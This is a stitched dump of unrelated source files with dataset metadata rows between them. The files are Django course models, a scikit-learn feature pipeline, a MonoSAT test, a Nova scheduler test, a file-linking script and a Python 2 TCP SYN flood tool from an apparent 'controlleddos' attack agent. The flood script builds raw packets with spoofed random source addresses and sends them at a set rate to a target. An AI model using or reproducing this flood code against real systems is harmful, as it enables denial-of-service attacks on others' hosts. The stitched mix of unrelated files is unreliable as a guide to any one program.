_merge_prefix(deque, new_len)
def _merge_prefix(deque, size):
"""Replace the first entries in a deque of strings with a single
string of up to size bytes.
>>> d = collections.deque(['abc', 'de', 'fghi', 'j'])
>>> _merge_prefix(d, 5); print(d)
deque(['abcde', 'fghi', 'j'])
Strings will be split as necessary to reach the desired size.
>>> _merge_prefix(d, 7); print(d)
deque(['abcdefg', 'hi', 'j'])
>>> _merge_prefix(d, 3); print(d)
deque(['abc', 'defg', 'hi', 'j'])
>>> _merge_prefix(d, 100); print(d)
deque(['abcdefghij'])
"""
if len(deque) == 1 and len(deque[0]) <= size:
return
prefix = []
remaining = size
while deque and remaining > 0:
chunk = deque.popleft()
if len(chunk) > remaining:
deque.appendleft(chunk[remaining:])
chunk = chunk[:remaining]
prefix.append(chunk)
remaining -= len(chunk)
# This data structure normally just contains byte strings, but
# the unittest gets messy if it doesn't use the default str() type,
# so do the merge based on the type of data that's actually present.
if prefix:
deque.appendleft(type(prefix[0])().join(prefix))
if not deque:
deque.appendleft(b"")
def doctests():
import doctest
return doctest.DocTestSuite()
| gpl-3.0 | 8,333,440,828,056,137,000 | 41.058027 | 128 | 0.589649 | false |
crowd-course/scholars | scholars/courses/models.py | 1 | 19377 | import os
import pytz
from datetime import tzinfo, timedelta, datetime
from django.conf import settings
from django.core.validators import MinValueValidator
from django.db import models
from django.db.models import F, Count, ExpressionWrapper, DateField, DateTimeField
from django.db.models.signals import pre_delete, post_save, pre_save
from django.utils.translation import gettext_noop
from model_utils import Choices, FieldTracker
from scholars.courses.signals import update_course_counters, update_course_status_phase
from scholars.users.models import User
from scholars.utils.models import TimeStampable
from scholars.utils.utils import clear_folder
from scholars.utils.utils import import_presentation, send_manually_exception_email, copy_file, writable_permissions
from scholars.utils.slack import Slack
def get_image_path(instance, filename):
import os
full_name = os.path.join(
"%d" % instance.course.id, "images", "%03d.png" % instance.position)
media_path = os.path.join(settings.MEDIA_ROOT, full_name)
# if os.path.exists(media_path):
# return os.path.join(settings.MEDIA_URL, full_name)
return full_name
def get_audio_path(instance, filename):
import os
full_name = os.path.join(
"%d" % instance.course.id, "audio", "%03d.mp3" % instance.position)
media_path = os.path.join(settings.MEDIA_ROOT, full_name)
# if os.path.exists(media_path):
# return os.path.join(settings.MEDIA_URL, full_name)
return full_name
def get_video_path(id):
import os
full_name = os.path.join(
"%d" % id, "videos", "video.mp4")
media_path = os.path.join(settings.MEDIA_ROOT, full_name)
if os.path.exists(media_path):
return os.path.join(settings.MEDIA_URL, full_name)
return None
class Category(TimeStampable):
name = models.CharField(max_length=2048, unique=True)
shortcode = models.CharField(max_length=8, null=True, blank=True)
class Meta:
verbose_name_plural = "categories"
def __unicode__(self):
return "%s" % self.name
def __str__(self):
return "%s" % self.name
class CourseQuerySet(models.QuerySet):
def in_progress(self):
return self.filter(
status=Course.STATUS.in_progress
)
def include_members_needed(self):
return self.select_related().annotate(
presentation_needed=F('num_presentation') - F('num_presentation_actual'),
graphics_needed=F('num_graphics') - F('num_graphics_actual'),
scripting_needed=F('num_scripting') - F('num_scripting_actual'),
audio_needed=F('num_audio') - F('num_audio_actual'),
dri_needed=F('num_dri') - F('num_dri_actual'),
members_count=Count('members'),
min_date=ExpressionWrapper(F('created_at') + timedelta(days=7), output_field=DateTimeField())
)
def meets_requirements_for_in_progress(self):
return self.include_members_needed().filter(
status=Course.STATUS.proposed,
min_date__lt=datetime.now(pytz.timezone('UTC')),
presentation_needed__lte=0,
graphics_needed__lte=0,
scripting_needed__lte=0,
audio_needed__lte=0,
dri_needed__lte=0,
members_count__gte=10
).order_by('-members_count')
class Course(TimeStampable):
STATUS = Choices(
(0, 'proposed', 'Proposed'),
(1, 'in_progress', 'In Progress'),
(2, 'published', 'Published')
)
PHASE = Choices(
(0, 'onboarding', 'Onboarding'),
(1, 'reading', 'Reading'),
(2, 'discussion', 'Discussion'),
(3, 'slides', 'Slides'),
(4, 'peer_review', 'Peer Review'),
(5, 'audio', 'Audio'),
(6, 'refine', 'Refinement'),
(7, 'pending_approval', 'Pending Approval'),
)
LANGUAGE = Choices(
('xx', 'xx', gettext_noop('Unknown')),
('af', 'af', gettext_noop('Afrikaans')),
('ar', 'ar', gettext_noop('Arabic')),
('ast', 'ast', gettext_noop('Asturian')),
('az', 'az', gettext_noop('Azerbaijani')),
('bg', 'bg', gettext_noop('Bulgarian')),
('be', 'be', gettext_noop('Belarusian')),
('bn', 'bn', gettext_noop('Bengali')),
('br', 'br', gettext_noop('Breton')),
('bs', 'bs', gettext_noop('Bosnian')),
('ca', 'ca', gettext_noop('Catalan')),
('cs', 'cs', gettext_noop('Czech')),
('cy', 'cy', gettext_noop('Welsh')),
('da', 'da', gettext_noop('Danish')),
('de', 'de', gettext_noop('German')),
('el', 'el', gettext_noop('Greek')),
('en', 'en', gettext_noop('English')),
('eo', 'eo', gettext_noop('Esperanto')),
('es', 'es', gettext_noop('Spanish')),
('et', 'et', gettext_noop('Estonian')),
('eu', 'eu', gettext_noop('Basque')),
('fa', 'fa', gettext_noop('Persian')),
('fi', 'fi', gettext_noop('Finnish')),
('fil', 'fil', gettext_noop('Filipino')),
('fr', 'fr', gettext_noop('French')),
('fy', 'fy', gettext_noop('Frisian')),
('ga', 'ga', gettext_noop('Irish')),
('gd', 'gd', gettext_noop('Scottish Gaelic')),
('gl', 'gl', gettext_noop('Galician')),
('he', 'he', gettext_noop('Hebrew')),
('hi', 'hi', gettext_noop('Hindi')),
('hr', 'hr', gettext_noop('Croatian')),
('hu', 'hu', gettext_noop('Hungarian')),
('ia', 'ia', gettext_noop('Interlingua')),
('id', 'id', gettext_noop('Indonesian')),
('io', 'io', gettext_noop('Ido')),
('is', 'is', gettext_noop('Icelandic')),
('it', 'it', gettext_noop('Italian')),
('ja', 'ja', gettext_noop('Japanese')),
('ka', 'ka', gettext_noop('Georgian')),
('kk', 'kk', gettext_noop('Kazakh')),
('km', 'km', gettext_noop('Khmer')),
('kn', 'kn', gettext_noop('Kannada')),
('ko', 'ko', gettext_noop('Korean')),
('lb', 'lb', gettext_noop('Luxembourgish')),
('lt', 'lt', gettext_noop('Lithuanian')),
('lv', 'lv', gettext_noop('Latvian')),
('mk', 'mk', gettext_noop('Macedonian')),
('ml', 'ml', gettext_noop('Malayalam')),
('mn', 'mn', gettext_noop('Mongolian')),
('mr', 'mr', gettext_noop('Marathi')),
('my', 'my', gettext_noop('Burmese')),
('nb', 'nb', gettext_noop('Norwegian Bokmal')),
('ne', 'ne', gettext_noop('Nepali')),
('nl', 'nl', gettext_noop('Dutch')),
('nn', 'nn', gettext_noop('Norwegian Nynorsk')),
('or', 'or', gettext_noop('Odia')),
('os', 'os', gettext_noop('Ossetic')),
('pa', 'pa', gettext_noop('Punjabi')),
('pl', 'pl', gettext_noop('Polish')),
('pt', 'pt', gettext_noop('Portuguese')),
('ro', 'ro', gettext_noop('Romanian')),
('ru', 'ru', gettext_noop('Russian')),
('sk', 'sk', gettext_noop('Slovak')),
('sl', 'sl', gettext_noop('Slovenian')),
('sq', 'sq', gettext_noop('Albanian')),
('sr', 'sr', gettext_noop('Serbian')),
('sv', 'sv', gettext_noop('Swedish')),
('sw', 'sw', gettext_noop('Swahili')),
('ta', 'ta', gettext_noop('Tamil')),
('te', 'te', gettext_noop('Telugu')),
('th', 'th', gettext_noop('Thai')),
('tr', 'tr', gettext_noop('Turkish')),
('tt', 'tt', gettext_noop('Tatar')),
('udm', 'udm', gettext_noop('Udmurt')),
('uk', 'uk', gettext_noop('Ukrainian')),
('ur', 'ur', gettext_noop('Urdu')),
('vi', 'vi', gettext_noop('Vietnamese')),
('zh', 'zh', gettext_noop('Mandarin')),
('zho', 'zho', gettext_noop('Chinese')),
)
doi = models.CharField(max_length=256, null=True, blank=True)
parent = models.ForeignKey('self', null=True, blank=True, related_name="variants")
version = models.PositiveIntegerField(default=1)
lang = models.CharField(max_length=8, choices=LANGUAGE, default='en')
name = models.CharField(max_length=2048)
owner = models.ForeignKey(User, related_name='courses')
status = models.PositiveIntegerField(choices=STATUS, default=STATUS.proposed)
phase = models.PositiveIntegerField(choices=PHASE, default=PHASE.onboarding)
is_featured = models.BooleanField(default=False)
category = models.ForeignKey(Category, on_delete=models.SET_NULL, null=True, blank=True)
url = models.CharField(max_length=1024, null=True, blank=True)
pdf = models.CharField(max_length=1024, null=True, blank=True)
type = models.CharField(max_length=256, null=True, blank=True)
publisher = models.CharField(max_length=2048, null=True, blank=True)
published_on = models.DateField(null=True, blank=True)
authors = models.CharField(max_length=4096, null=True, blank=True)
pages = models.CharField(max_length=64, null=True, blank=True)
# minimum requirements
num_presentation = models.PositiveIntegerField(default=2, validators=[MinValueValidator(1)])
num_graphics = models.PositiveIntegerField(default=2, validators=[MinValueValidator(0)])
num_scripting = models.PositiveIntegerField(default=2, validators=[MinValueValidator(1)])
num_audio = models.PositiveIntegerField(default=2, validators=[MinValueValidator(1)])
num_dri = models.PositiveIntegerField(default=2)
# available
num_presentation_actual = models.PositiveIntegerField(default=0, validators=[MinValueValidator(0)])
num_graphics_actual = models.PositiveIntegerField(default=0, validators=[MinValueValidator(0)])
num_scripting_actual = models.PositiveIntegerField(default=0, validators=[MinValueValidator(0)])
num_audio_actual = models.PositiveIntegerField(default=0, validators=[MinValueValidator(0)])
num_dri_actual = models.PositiveIntegerField(default=0, validators=[MinValueValidator(0)])
# presentation
gid = models.CharField(max_length=256, null=True, blank=True)
# questionnaire
qid = models.CharField(max_length=256, null=True, blank=True)
# slack
cid = models.CharField(max_length=256, null=True, blank=True)
channel = models.CharField(max_length=256, null=True, blank=True)
# youtube
yid = models.CharField(max_length=256, null=True, blank=True)
# timelines
in_progress_at = models.DateTimeField(null=True, blank=True)
# phase timelines
reading_at = models.DateTimeField(null=True, blank=True)
discussion_at = models.DateTimeField(null=True, blank=True)
slides_at = models.DateTimeField(null=True, blank=True)
peer_review_at = models.DateTimeField(null=True, blank=True)
audio_at = models.DateTimeField(null=True, blank=True)
refine_at = models.DateTimeField(null=True, blank=True)
pending_approval_at = models.DateTimeField(null=True, blank=True)
approved_at = models.DateTimeField(null=True, blank=True)
tracker = FieldTracker(fields=['status', 'phase'])
objects = models.Manager()
requirements = CourseQuerySet.as_manager()
class Meta:
unique_together = ('name', 'lang', 'version')
def __unicode__(self):
return "%s [%d slides][%s]" % (self.name, self.slides.count(), self.lang)
def __str__(self):
return "%s [%d slides][%s]" % (self.name, self.slides.count(), self.lang)
@property
def phase_display(self):
return Course.PHASE[self.phase]
@property
def status_display(self):
return Course.STATUS[self.status]
@property
def youtube_display(self):
if self.yid == '' or self.yid is None:
return ''
return 'https://youtu.be/%s' % self.yid
@property
def category_display(self):
if self.category is not None:
return self.category.name
return 'General'
@property
def lang_display(self):
if self.lang is not None:
return Course.LANGUAGE[self.lang]
return 'Unknown'
@property
def num_presentation_required(self):
required = self.num_presentation - self.num_presentation_actual
if required >= 0:
return required
return 0
@property
def num_graphics_required(self):
required = self.num_graphics - self.num_graphics_actual
if required >= 0:
return required
return 0
@property
def num_scripting_required(self):
required = self.num_scripting - self.num_scripting_actual
if required >= 0:
return required
return 0
@property
def num_audio_required(self):
required = self.num_audio - self.num_audio_actual
if required >= 0:
return required
return 0
@property
def num_dri_required(self):
required = self.num_dri - self.num_dri_actual
if required >= 0:
return required
return 0
@property
def total_members(self):
return self.members.count()
def get_video_url(self):
video_url = get_video_path(self.id)
if video_url is not None:
return '<a href="%s" target="_blank">Video</a>' % video_url
# u'<video width="320" height="240" controls><source src="%s" type="video/mp4">Your browser does not support the video tag.</video>' % video_url
return None
get_video_url.short_description = 'Video'
get_video_url.allow_tags = True
@property
def video_url(self):
video_url = None
if self.id is not None:
video_url = get_video_path(self.id)
return video_url
def total_slides(self):
if self.slides is not None:
return self.slides.count()
return 0
total_slides.short_description = 'Total Slides'
def pending_slides(self):
if self.slides is not None:
return self.slides.filter(status=Slide.STATUS.pending_approval).count()
return 0
pending_slides.short_description = 'Pending Approval'
def delete(self, using=None, keep_parents=False):
if self.pk is not None and len(str(self.pk)) > 0:
folder = os.path.join(settings.MEDIA_ROOT, '%d' % self.pk)
try:
clear_folder(folder)
except:
pass
super(Course, self).delete()
def make_in_progress(self):
try:
if self.id is not None:
# create questionnaire
if self.qid is None:
response = copy_file(self.id, settings.QUESTIONNAIRE_TEMPLATE, self.name)
writable_permissions(response['id'])
self.qid = response['id']
# self.save()
# copy_file(self.id, settings.WORKFLOW_TEMPLATE, self.name)
# create presentation
if self.gid is None:
response = copy_file(self.id, settings.PRESENTATION_TEMPLATE, self.name)
writable_permissions(response['id'])
self.gid = response['id']
# self.save()
try:
# create slack channel
if self.cid is None:
slack = Slack()
result = slack.create_channel('%s%d' % (self.category.shortcode.lower(), self.id))
print result
if 'ok' in result and result['ok']:
self.channel = result['channel']['name']
self.cid = result['channel']['id']
except Exception as es:
print "slack"
print es
except Exception as e:
# todo call sentry
print "error while changing status to progress"
print e
pre_save.connect(update_course_status_phase, sender=Course)
class CourseMember(TimeStampable):
EXPERTISE = Choices(
(1, 'novice', 'Novice'),
(2, 'primary', 'Primary'),
(3, 'medium', 'Medium'),
(4, 'advanced', 'Advanced'),
(5, 'expert', 'Expert'),
)
TIMEZONES = [(str(i), str(i)) for i in pytz.all_timezones]
course = models.ForeignKey(Course, on_delete=models.CASCADE, related_name='members')
member = models.ForeignKey(User, related_name='course_contributions')
expertise = models.PositiveIntegerField(choices=EXPERTISE, default=EXPERTISE.novice)
timezone = models.CharField(max_length=128, choices=TIMEZONES, blank=True, null=True)
time_commitment = models.PositiveIntegerField(default=0) # hours per week
presentation = models.BooleanField(default=False)
graphics = models.BooleanField(default=False)
scripting = models.BooleanField(default=False)
audio = models.BooleanField(default=False)
dri = models.BooleanField(default=False)
been_dri = models.BooleanField(default=False)
# field for actual selection
is_dri = models.BooleanField(default=False)
class Meta:
unique_together = ('course', 'member')
def __str__(self):
return '%s - %s'% (self.course.name, self.member.username)
pre_delete.connect(update_course_counters, sender=CourseMember)
class Slide(TimeStampable):
STATUS = Choices(
(0, 'draft', 'Draft'),
(1, 'in_progress', 'In Progress'),
(2, 'pending_approval', 'Pending Approval'),
(3, 'published', 'Published')
)
gid = models.CharField(max_length=256, null=True, blank=True)
version = models.PositiveIntegerField(default=1)
image = models.ImageField(upload_to=get_image_path, null=True, blank=True)
audio = models.FileField(upload_to=get_audio_path, null=True, blank=True)
notes = models.TextField(max_length=5000, null=True, blank=True)
position = models.PositiveIntegerField(default=0)
course = models.ForeignKey(Course, on_delete=models.CASCADE, related_name='slides')
status = models.PositiveIntegerField(choices=STATUS, default=STATUS.draft)
assigned_to = models.ForeignKey(User, related_name='slides', null=True, blank=True)
class Meta:
ordering = ['position']
def __str__(self):
return '%s %d' % (self.course.name, self.position)
@property
def status_text(self):
return self.STATUS[self.status]
# @property
def image_url(self):
return u'<img src="%s" style="max-width:250px;max-height:250px" />' % self.image.url
image_url.short_description = 'Image'
image_url.allow_tags = True
# @property
def audio_url(self):
return u'<audio controls src="%s" style="max-width:200px;" />' % self.audio.url
audio_url.short_description = 'Audio'
audio_url.allow_tags = True
class SlideReview(TimeStampable):
STATUS = Choices(
(1, 'proposed', 'Proposed'),
(2, 'resolved', 'Resolved')
)
STAGE = Choices(
(1, 'peer_review', 'Peer Review'),
(2, 'refine', 'Refine')
)
slide = models.ForeignKey(Slide, on_delete=models.CASCADE, related_name='reviews')
feedback = models.TextField(max_length=5000, null=True, blank=True)
status = models.PositiveIntegerField(choices=STATUS, default=STATUS.proposed)
stage = models.PositiveIntegerField(choices=STAGE, default=STAGE.peer_review)
user = models.ForeignKey(User, related_name='reviews', null=True, blank=True)
def __str__(self):
return '%s %s' % (self.slide.course.name, self.STAGE[self.stage])
| mit | -8,950,352,779,626,918,000 | 35.838403 | 156 | 0.604944 | false |
Transkribus/TranskribusDU | TranskribusDU/graph/FeatureDefinition_Generic.py | 1 | 6856 | # -*- coding: utf-8 -*-
"""
Standard PageXml features:
- not using the page information
- using a QuantileTransformer for numerical features instead of a StandardScaler
No link with DOm or JSON => named GENERIC
Copyright Xerox(C) 2016, 2019 JL. Meunier
Developed for the EU project READ. The READ project has received funding
from the European Union�s Horizon 2020 research and innovation programme
under grant agreement No 674943.
"""
import numpy as np
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.feature_extraction.text import TfidfVectorizer
#not robust to empty arrays, so use our robust intermediary class instead
#from sklearn.preprocessing import StandardScaler
from .Transformer import SparseToDense
from .FeatureDefinition import FeatureDefinition
from .Transformer import EmptySafe_QuantileTransformer as QuantileTransformer
from .Transformer_Generic import NodeTransformerTextEnclosed
from .Transformer_Generic import NodeTransformerTextLen
from .Transformer_Generic import NodeTransformerXYWH
from .Transformer_Generic import NodeTransformerNeighbors
from .Transformer_Generic import EdgeBooleanAlignmentFeatures
from .Transformer_Generic import EdgeNumericalSelector_noText
class FeatureDefinition_Generic(FeatureDefinition):
n_QUANTILES = 64
def __init__(self
, n_tfidf_node=None, t_ngrams_node=None, b_tfidf_node_lc=None
#, n_tfidf_edge=None, t_ngrams_edge=None, b_tfidf_edge_lc=None
):
FeatureDefinition.__init__(self)
self.n_tfidf_node, self.t_ngrams_node, self.b_tfidf_node_lc = n_tfidf_node, t_ngrams_node, b_tfidf_node_lc
# self.n_tfidf_edge, self.t_ngrams_edge, self.b_tfidf_edge_lc = n_tfidf_edge, t_ngrams_edge, b_tfidf_edge_lc
tdifNodeTextVectorizer = TfidfVectorizer(lowercase=self.b_tfidf_node_lc
, max_features=self.n_tfidf_node
, analyzer = 'char'
, ngram_range=self.t_ngrams_node #(2,6)
, dtype=np.float64)
node_transformer = FeatureUnion( [ #CAREFUL IF YOU CHANGE THIS - see cleanTransformers method!!!!
("text", Pipeline([
('selector', NodeTransformerTextEnclosed()),
# ('tfidf', TfidfVectorizer(lowercase=self.b_tfidf_node_lc, max_features=self.n_tfidf_node
# , analyzer = 'char', ngram_range=self.tNODE_NGRAMS #(2,6)
# , dtype=np.float64)),
('tfidf', tdifNodeTextVectorizer), #we can use it separately from the pipleline once fitted
('todense', SparseToDense()) #pystruct needs an array, not a sparse matrix
])
)
, ("textlen", Pipeline([
('selector', NodeTransformerTextLen()),
('textlen', QuantileTransformer(n_quantiles=self.n_QUANTILES, copy=False)) #use in-place scaling
])
)
, ("xywh", Pipeline([
('selector', NodeTransformerXYWH()),
#v1 ('xywh', StandardScaler(copy=False, with_mean=True, with_std=True)) #use in-place scaling
('xywh', QuantileTransformer(n_quantiles=self.n_QUANTILES, copy=False)) #use in-place scaling
])
)
, ("neighbors", Pipeline([
('selector', NodeTransformerNeighbors()),
#v1 ('neighbors', StandardScaler(copy=False, with_mean=True, with_std=True)) #use in-place scaling
('neighbors', QuantileTransformer(n_quantiles=self.n_QUANTILES, copy=False)) #use in-place scaling
])
)
])
lEdgeFeature = [ #CAREFUL IF YOU CHANGE THIS - see cleanTransformers method!!!!
("boolean", Pipeline([
('boolean', EdgeBooleanAlignmentFeatures())
])
)
, ("numerical", Pipeline([
('selector', EdgeNumericalSelector_noText()),
#v1 ('numerical', StandardScaler(copy=False, with_mean=True, with_std=True)) #use in-place scaling
('numerical', QuantileTransformer(n_quantiles=self.n_QUANTILES, copy=False)) #use in-place scaling
])
)
]
edge_transformer = FeatureUnion( lEdgeFeature )
#return _node_transformer, _edge_transformer, tdifNodeTextVectorizer
self._node_transformer = node_transformer
self._edge_transformer = edge_transformer
self.tfidfNodeTextVectorizer = None #tdifNodeTextVectorizer
def cleanTransformers(self):
"""
the TFIDF transformers are keeping the stop words => huge pickled file!!!
Here the fix is a bit rough. There are better ways....
JL
"""
self._node_transformer.transformer_list[0][1].steps[1][1].stop_words_ = None #is 1st in the union...
# if self.bMirrorPage:
# imax = 9
# else:
# imax = 7
# for i in range(3, imax):
# self._edge_transformer.transformer_list[i][1].steps[1][1].stop_words_ = None #are 3rd and 4th in the union....
return self._node_transformer, self._edge_transformer
| bsd-3-clause | -1,083,404,007,872,868,900 | 54.274194 | 156 | 0.47724 | false |
mikeberkelaar/controlleddos | Attack_Agent/attacks/syn2.py | 1 | 4434 | '''
Syn flood program in python using raw sockets (Linux)
Initial: Silver Moon (m00n.silv3r@gmail.com)
'''
# some imports
import socket, sys, random, time, Queue
from struct import *
class SYNFLOOD():
def __init__(self, Q, TARGET_IP, TARGET_PORT, RATE):
#threading.Thread.__init__(self) # Required for threaded class
self.target = TARGET_IP
self.port = TARGET_PORT
self.rate = RATE
self.instruction_q = Q
#create a raw socket
try:
self.s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
except socket.error , msg:
print 'Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
# tell kernel not to put in headers, since we are providing it
self.s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
self.allpackets = []
# checksum functions needed for calculation checksum
def checksum(self,msg):
s = 0
# loop taking 2 characters at a time
for i in range(0, len(msg), 2):
w = (ord(msg[i]) << 8) + (ord(msg[i+1]) )
s = s + w
s = (s>>16) + (s & 0xffff);
#s = s + (s >> 16);
#complement and mask to 4 byte short
s = ~s & 0xffff
return s
def pkt(self):
# now start constructing the packet
packet = '';
# source_ip = '145.100.105.66'
source_ip = "%i.%i.%i.%i" % (10,random.randint(1,254),random.randint(1,254),random.randint(1,254))
#global dest_ip
#dest_ip = '145.100.104.173' # or socket.gethostbyname('www.google.com')
# ip header fields
ihl = 5
version = 4
tos = 0
tot_len = 20 + 20 # python seems to correctly fill the total length, dont know how ??
id = 54321 #Id of this packet
frag_off = 0
ttl = 255
protocol = socket.IPPROTO_TCP
check = 10 # python seems to correctly fill the checksum
saddr = socket.inet_aton ( source_ip ) #Spoof the source ip address if you want to
daddr = socket.inet_aton ( self.target )
ihl_version = (version << 4) + ihl
# the ! in the pack format string means network order
ip_header = pack('!BBHHHBBH4s4s' , ihl_version, tos, tot_len, id, frag_off, ttl, protocol, check, saddr, daddr)
# tcp header fields
source = 40567 # source port
#source = random.randint(1000,40000)
dest = self.port # destination port
seq = 0
ack_seq = 0
doff = 5 #4 bit field, size of tcp header, 5 * 4 = 20 bytes
#tcp flags
fin = 0
syn = 1
rst = 0
psh = 0
ack = 0
urg = 0
window = socket.htons (5840) # maximum allowed window size
check = 0
urg_ptr = 0
offset_res = (doff << 4) + 0
tcp_flags = fin + (syn << 1) + (rst << 2) + (psh <<3) + (ack << 4) + (urg << 5)
# the ! in the pack format string means network order
tcp_header = pack('!HHLLBBHHH' , source, dest, seq, ack_seq, offset_res, tcp_flags, window, check, urg_ptr)
# pseudo header fields
source_address = socket.inet_aton( source_ip )
dest_address = socket.inet_aton(self.target)
#dest_address = socket.inet_aton(self.target)
placeholder = 0
protocol = socket.IPPROTO_TCP
tcp_length = len(tcp_header)
psh = pack('!4s4sBBH' , source_address , self.target , placeholder , protocol , tcp_length);
psh = psh + tcp_header;
tcp_checksum = self.checksum(psh)
# make the tcp header again and fill the correct checksum
tcp_header = pack('!HHLLBBHHH' , source, dest, seq, ack_seq, offset_res, tcp_flags, window, tcp_checksum , urg_ptr)
# final full packet - syn packets dont have any data
packet = ip_header + tcp_header
#Send the packet finally - the port specified has no effect
total = 0
self.allpackets.append(packet)
# print packet
def main(self):
time1 = time.time()
for i in range(10000):
self.pkt()
while 1:
i = 0 # Counter
for P in self.allpackets:
i += 1
if i == 20: # Every 20 packets -> Queue.get for possible instructions
i = 0
try:
data = self.instruction_q.get(False)
data_id = data['id']
if data[data_id]['status'] == "STOP":
break # Return to 'Listening' state / Xattacker.run()
else:
self.rate = data[data_id]['rate'] # Adjust rate
except Queue.Empty:
pass
# Although we should time out if we may be actually DDOSSING ourselfs <------------
self.s.sendto(P, (self.target , 0 )) # put this in a loop if you want to flood the target
time.sleep(float(1)/self.rate)
#print total
| apache-2.0 | -5,974,400,502,629,511,000 | 29.57931 | 118 | 0.62562 | false |
sambayless/monosat | tests/python/rnd_pb_opt.py | 1 | 2332 | from monosat import *
import functools
import math
from monosat import *
import os
from random import shuffle
import random
import random
import sys
import itertools
filename=None
if __name__ == "__main__":
seed = random.randint(1,100000)
if len(sys.argv)>1:
filename=sys.argv[1]
if len(sys.argv)>2:
seed=int(sys.argv[2])
Monosat().newSolver(filename)
print("begin encode");
random.seed(seed)
print("RandomSeed=" + str(seed))
#
width=4
nbvs= 15
nsubsets=8
selects = []
for n in range(nbvs):
selects.append(true() if random.random()>0.5 else false())
max_subsets=[]
min_subsets=[]
selecteds=[]
for i in range(nsubsets):
max_subset=[]
min_subset=[]
selected=[]
selecteds.append(selected)
max_subsets.append(max_subset)
min_subsets.append(min_subset)
weights = []
for v in selects:
weights.append(random.randint(-10,10))
select = Var()
selected.append(select)
max_subset.append(If(select,v,false())) #1<<width-1
#min_subset.append(If(select,Not(v),false())) #1<<width-1
weightval = sum(weights[0:len(weights)//2])
random.shuffle(weights)
AssertEqualPB(selected, weightval,weights)
maxs = []
for subset in max_subsets:
maxs.append(PopCount(subset,method="BV",return_bv=True))
#mins = []
#for subset in min_subsets:
# mins.append(PopCount(subset,method="BV",return_bv=True))
for a,b in itertools.combinations(maxs,2):
Assert(a!=b)
"""
for a,b in itertools.combinations(mins,2):
Assert(a!=b)"""
result =Solve()
print("Result is " + str(result))
if result:
print(" ".join(str(s.value()) for s in selects))
for subset in selecteds:
print(" ".join(str(s.value()) for s in subset))
print("maxs:")
for m in maxs:
print(str(m.value()))
#print("mins:")
#for m in mins:
# print(str(m.value()))
print("done")
sys.exit(10)
else:
sys.exit(20)
Monosat().setOutputFile("/tmp/test.gnf")
vars=[]
for v in range(10):
vars.append(Var())
AssertEqualPB(vars,2);
AssertLessEqPB(vars, 4)
AssertGreaterThanPB(vars, 1)
weights = list(range(10))
maximize(vars,weights)
result=Solve()
sum = 0
for i,v in enumerate(vars):
print(v.value())
if (v.value()):
sum+=weights[i]
print("Result is " + str(result))
assert(result==True)
| mit | 323,489,700,240,237,440 | 18.433333 | 65 | 0.639365 | false |
luzheqi1987/nova-annotation | nova/tests/unit/scheduler/filters/test_aggregate_instance_extra_specs_filters.py | 1 | 3135 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from nova.scheduler.filters import aggregate_instance_extra_specs as agg_specs
from nova import test
from nova.tests.unit.scheduler import fakes
@mock.patch('nova.db.aggregate_metadata_get_by_host')
class TestAggregateInstanceExtraSpecsFilter(test.NoDBTestCase):
def setUp(self):
super(TestAggregateInstanceExtraSpecsFilter, self).setUp()
self.filt_cls = agg_specs.AggregateInstanceExtraSpecsFilter()
def test_aggregate_filter_passes_no_extra_specs(self, agg_mock):
capabilities = {'opt1': 1, 'opt2': 2}
filter_properties = {'context': mock.sentinel.ctx, 'instance_type':
{'memory_mb': 1024}}
host = fakes.FakeHostState('host1', 'node1', capabilities)
self.assertTrue(self.filt_cls.host_passes(host, filter_properties))
self.assertFalse(agg_mock.called)
def _do_test_aggregate_filter_extra_specs(self, especs, passes):
filter_properties = {'context': mock.sentinel.ctx,
'instance_type': {'memory_mb': 1024, 'extra_specs': especs}}
host = fakes.FakeHostState('host1', 'node1',
{'free_ram_mb': 1024})
assertion = self.assertTrue if passes else self.assertFalse
assertion(self.filt_cls.host_passes(host, filter_properties))
def test_aggregate_filter_passes_extra_specs_simple(self, agg_mock):
agg_mock.return_value = {'opt1': '1', 'opt2': '2'}
especs = {
# Un-scoped extra spec
'opt1': '1',
# Scoped extra spec that applies to this filter
'aggregate_instance_extra_specs:opt2': '2',
# Scoped extra spec that does not apply to this filter
'trust:trusted_host': 'true',
}
self._do_test_aggregate_filter_extra_specs(especs, passes=True)
def test_aggregate_filter_passes_with_key_same_as_scope(self, agg_mock):
agg_mock.return_value = {'aggregate_instance_extra_specs': '1'}
especs = {
# Un-scoped extra spec, make sure we don't blow up if it
# happens to match our scope.
'aggregate_instance_extra_specs': '1',
}
self._do_test_aggregate_filter_extra_specs(especs, passes=True)
def test_aggregate_filter_fails_extra_specs_simple(self, agg_mock):
agg_mock.return_value = {'opt1': '1', 'opt2': '2'}
especs = {
'opt1': '1',
'opt2': '222',
'trust:trusted_host': 'true'
}
self._do_test_aggregate_filter_extra_specs(especs, passes=False)
| apache-2.0 | -5,408,682,348,444,999,000 | 42.541667 | 78 | 0.642743 | false |
drtuxwang/system-config | bin/flink.py | 1 | 4916 | #!/usr/bin/env python3
"""
Recursively link all files.
"""
import argparse
import glob
import os
import signal
import sys
from typing import List
import file_mod
class Options:
"""
Options class
"""
def __init__(self) -> None:
self._args: argparse.Namespace = None
self.parse(sys.argv)
def get_directories(self) -> List[str]:
"""
Return list of directories.
"""
return self._args.directories
def _parse_args(self, args: List[str]) -> None:
parser = argparse.ArgumentParser(
description='Recursively link all files.',
)
parser.add_argument(
'directories',
nargs='+',
metavar='directory',
help='Directory containing files to link.'
)
self._args = parser.parse_args(args)
for directory in self._args.directories:
if not os.path.isdir(directory):
raise SystemExit(
sys.argv[0] + ': Source directory "' + directory +
'" does not exist.'
)
if os.path.samefile(directory, os.getcwd()):
raise SystemExit(
sys.argv[0] + ': Source directory "' + directory +
'" cannot be current directory.'
)
def parse(self, args: List[str]) -> None:
"""
Parse arguments
"""
self._parse_args(args[1:])
class Main:
"""
Main class
"""
def __init__(self) -> None:
try:
self.config()
sys.exit(self.run())
except (EOFError, KeyboardInterrupt):
sys.exit(114)
except SystemExit as exception:
sys.exit(exception)
@staticmethod
